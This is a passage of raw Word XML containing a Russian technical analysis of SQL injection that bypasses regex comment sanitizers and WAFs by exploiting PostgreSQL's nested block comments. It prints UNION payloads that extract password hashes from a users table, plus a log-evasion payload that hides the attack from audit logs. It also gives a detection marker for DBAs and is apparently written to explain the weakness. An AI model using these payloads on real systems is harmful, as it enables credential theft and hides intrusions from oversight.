          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.DOTALL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Идея разработчика: «удалить всё от первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до последнего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>». Это блокирует Payload A структуру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2A91F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Но greedy-фильтр имеет другую слабость — он удаляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>слишком много</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий может проложить запрос вокруг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283ED4F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CE53F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'/*WAF-blocked-keyword*/UNION/*another*/SELECT id,email,password_hash FROM users WHERE'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B734961" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer greedy: ищет первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → последний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. От </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*WAF-blocked-keyword*/UNION/*another*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — между ними. Greedy удалит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всё</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между первым </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и последним </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D2B726" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin'SELECT id,email,password_hash FROM users WHERE'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC90D64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitizer вырезал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/.../*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> посередине). Но также вырезал часть payload — и в итоге выдал какую-то странную форму. WAF после sanitize-фильтра видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, email, password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — может пройти как «обычный SELECT с конкатенацией», если WAF не понимает контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52136DF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В PG-парсере же:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6ECF95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin'/*WAF-blocked-keyword*/UNION/*another*/SELECT id,email,password_hash FROM users WHERE'1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E7713" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Два отдельных комментария (PG обрабатывает их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>как два</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*WAF-blocked-keyword*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> закрылся на первом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потом второй </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*another*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>). PG получает функционально:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAD59E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, body FROM articles WHERE title = 'admin' UNION SELECT id, email, password_hash FROM users WHERE'1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71CD57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>— стандартная UNION-атака. Sanitizer убил часть payload-а, но осталось достаточно для inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF4C43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — nested как обход custom-пре-парсера ORM/log-стриппера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D6F05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: некоторые log-стрипперы (ORM-уровневые) удаляют комментарии из SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>перед</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> логированием, чтобы сократить логи. Если стриппер non-nested-aware, а PG nested-aware — разница в том, что логируется vs что выполняется. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defensive evasion</w:t>
      </w:r>
      <w:r>
        <w:t>, не WAF-bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318F400" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F556E07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT 1 /* legitimate-looking comment /* hidden_payload */ UNION SELECT password_hash FROM users */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6AEE10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Non-nested-aware стриппер: вырезает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* legitimate-looking comment /* hidden_payload */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — между первым </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и первым </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t>. Остаётся в логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003BCEC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT 1  UNION SELECT password_hash FROM users */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11778E2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">— но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в конце — синтаксис-ошибка, что заметно в логах. Стриппер не help-нул.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295C91C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Этот Payload C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> против PG-парсера: PG видит весь nested-block как один комментарий, всё после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — следующий statement (тут — синтаксис-ошибка). То есть Payload C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> успешен на стороне логирования (где non-nested-aware стриппер удаляет hidden_payload из логов, маскируя атаку), не на стороне PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375115F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это пример "log evasion" категории — атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не делает атаку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через nested-comment, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>скрывает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаку от логов. Маркер для DBA: SQL в логах с trailing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без opening — индикатор log-stripping evasion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC37147" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD8982" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход sanitizer-а с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"/\*.*?\*/"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-greedy фильтром: payload пройдёт через filter sanitizer-а, в PG-парсере прокинется как валидный SQL с UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF11C77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход sanitizer-а с greedy фильтром: greedy удаляет лишнее, но оставшийся SQL валиден для PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DDCBB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обход </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>log-стрипперов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для скрытия атаки от audit. Не атака сама по себе, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defensive evasion</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCCDBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD0C6C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-nested-aware regex-фильтр</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Python re </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"/\*.*?\*/"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-greedy, или другая SQL-naive формула) не учитывает PG-специфику.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A625962" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Greedy regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> удаляет слишком много, оставляя другой синтаксис, который не покрывается WAF-правилом на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BEFBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AST-парсер вместо regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> покрывает обе формы — но AST-парсер на pre-WAF-уровне дорогой и редко используется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F968DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79382D56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG block-comment грамматика</w:t>
      </w:r>
      <w:r>
        <w:t>: documentation https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-COMMENTS. Цитата: *"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* ... */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block comments nest, so that nesting is permitted: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* my /* nested */ comment */</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is treated as a complete comment."*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B303AA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Реализация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: в PG-source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть state </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (comment state) с counter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xcdepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++xcdepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--xcdepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; comment закрывается только когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xcdepth = 0</w:t>
      </w:r>
      <w:r>
